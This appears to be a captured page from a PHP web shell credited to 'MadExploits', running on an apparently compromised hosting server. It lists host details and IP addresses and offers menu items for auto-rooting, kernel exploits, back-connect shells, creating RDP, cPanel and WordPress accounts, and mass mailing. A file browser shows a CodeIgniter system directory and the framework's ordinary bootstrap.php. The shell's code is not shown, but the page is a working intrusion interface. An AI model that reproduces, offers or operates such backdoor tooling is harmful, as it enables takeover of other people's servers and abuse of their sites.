Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.223
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
public_html /
system /
[ HOME SHELL ]
Name
Size
Permission
Action
API
[ DIR ]
drwxr-xr-x
Autoloader
[ DIR ]
drwxr-xr-x
CLI
[ DIR ]
drwxr-xr-x
Cache
[ DIR ]
drwxr-xr-x
Commands
[ DIR ]
drwxr-xr-x
Config
[ DIR ]
drwxr-xr-x
Cookie
[ DIR ]
drwxr-xr-x
Database
[ DIR ]
drwxr-xr-x
Debug
[ DIR ]
drwxr-xr-x
Email
[ DIR ]
drwxr-xr-x
Encryption
[ DIR ]
drwxr-xr-x
Entity
[ DIR ]
drwxr-xr-x
Events
[ DIR ]
drwxr-xr-x
Exceptions
[ DIR ]
drwxr-xr-x
Files
[ DIR ]
drwxr-xr-x
Filters
[ DIR ]
drwxr-xr-x
Format
[ DIR ]
drwxr-xr-x
HTTP
[ DIR ]
drwxr-xr-x
Helpers
[ DIR ]
drwxr-xr-x
Honeypot
[ DIR ]
drwxr-xr-x
I18n
[ DIR ]
drwxr-xr-x
Images
[ DIR ]
drwxr-xr-x
Language
[ DIR ]
drwxr-xr-x
Log
[ DIR ]
drwxr-xr-x
Modules
[ DIR ]
drwxr-xr-x
Pager
[ DIR ]
drwxr-xr-x
Publisher
[ DIR ]
drwxr-xr-x
RESTful
[ DIR ]
drwxr-xr-x
Router
[ DIR ]
drwxr-xr-x
Security
[ DIR ]
drwxr-xr-x
Session
[ DIR ]
drwxr-xr-x
Test
[ DIR ]
drwxr-xr-x
ThirdParty
[ DIR ]
drwxr-xr-x
Throttle
[ DIR ]
drwxr-xr-x
Typography
[ DIR ]
drwxr-xr-x
Validation
[ DIR ]
drwxr-xr-x
View
[ DIR ]
drwxr-xr-x
BaseModel.php
47.57
KB
-rw-r--r--
CodeIgniter.php
29.8
KB
-rw-r--r--
Common.php
33.77
KB
-rw-r--r--
ComposerScripts.php
4.99
KB
-rw-r--r--
Controller.php
4.26
KB
-rw-r--r--
Entity.php
484
B
-rw-r--r--
Model.php
23.69
KB
-rw-r--r--
bootstrap.php
4.21
KB
-rw-r--r--
index.html
131
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bootstrap.php
<?php /** * This file is part of CodeIgniter 4 framework. * * (c) CodeIgniter Foundation <admin@codeigniter.com> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ use CodeIgniter\Config\DotEnv; use Config\Autoload; use Config\Modules; use Config\Paths; use Config\Services; /* * --------------------------------------------------------------- * SETUP OUR PATH CONSTANTS * --------------------------------------------------------------- * * The path constants provide convenient access to the folders * throughout the application. We have to setup them up here * so they are available in the config files that are loaded. */ // The path to the application directory. if (! defined('APPPATH')) { /** * @var Paths $paths */ define('APPPATH', realpath(rtrim($paths->appDirectory, '\\/ ')) . DIRECTORY_SEPARATOR); } // The path to the project root directory. Just above APPPATH. if (! defined('ROOTPATH')) { define('ROOTPATH', realpath(APPPATH . '../') . DIRECTORY_SEPARATOR); } // The path to the system directory. if (! defined('SYSTEMPATH')) { /** * @var Paths $paths */ define('SYSTEMPATH', realpath(rtrim($paths->systemDirectory, '\\/ ')) . DIRECTORY_SEPARATOR); } // The path to the writable directory. if (! defined('WRITEPATH')) { /** * @var Paths $paths */ define('WRITEPATH', realpath(rtrim($paths->writableDirectory, '\\/ ')) . DIRECTORY_SEPARATOR); } // The path to the tests directory if (! defined('TESTPATH')) { /** * @var Paths $paths */ define('TESTPATH', realpath(rtrim($paths->testsDirectory, '\\/ ')) . DIRECTORY_SEPARATOR); } /* * --------------------------------------------------------------- * GRAB OUR CONSTANTS & COMMON * --------------------------------------------------------------- */ if (! defined('APP_NAMESPACE')) { require_once APPPATH . 'Config/Constants.php'; } // Require app/Common.php file if exists. if (is_file(APPPATH . 'Common.php')) { require_once APPPATH . 'Common.php'; } // Require system/Common.php require_once SYSTEMPATH . 'Common.php'; /* * --------------------------------------------------------------- * LOAD OUR AUTOLOADER * --------------------------------------------------------------- * * The autoloader allows all of the pieces to work together in the * framework. We have to load it here, though, so that the config * files can use the path constants. */ if (! class_exists('Config\Autoload', false)) { require_once SYSTEMPATH . 'Config/AutoloadConfig.php'; require_once APPPATH . 'Config/Autoload.php'; require_once SYSTEMPATH . 'Modules/Modules.php'; require_once APPPATH . 'Config/Modules.php'; } require_once SYSTEMPATH . 'Autoloader/Autoloader.php'; require_once SYSTEMPATH . 'Config/BaseService.php'; require_once SYSTEMPATH . 'Config/Services.php'; require_once APPPATH . 'Config/Services.php'; // Use Config\Services as CodeIgniter\Services if (! class_exists('CodeIgniter\Services', false)) { class_alias('Config\Services', 'CodeIgniter\Services'); } // Initialize and register the loader with the SPL autoloader stack. Services::autoloader()->initialize(new Autoload(), new Modules())->register(); // Now load Composer's if it's available if (is_file(COMPOSER_PATH)) { /* * The path to the vendor directory. * * We do not want to enforce this, so set the constant if Composer was used. */ if (! defined('VENDORPATH')) { define('VENDORPATH', dirname(COMPOSER_PATH) . DIRECTORY_SEPARATOR); } require_once COMPOSER_PATH; } // Load environment settings from .env files into $_SERVER and $_ENV require_once SYSTEMPATH . 'Config/DotEnv.php'; $env = new DotEnv(ROOTPATH); $env->load(); // Always load the URL helper, it should be used in most of apps. helper('url'); /* * --------------------------------------------------------------- * GRAB OUR CODEIGNITER INSTANCE * --------------------------------------------------------------- * * The CodeIgniter class contains the core functionality to make * the application run, and does all of the dirty work to get * the pieces all working together. */ $app = Services::codeigniter(); $app->initialize(); return $app;
Close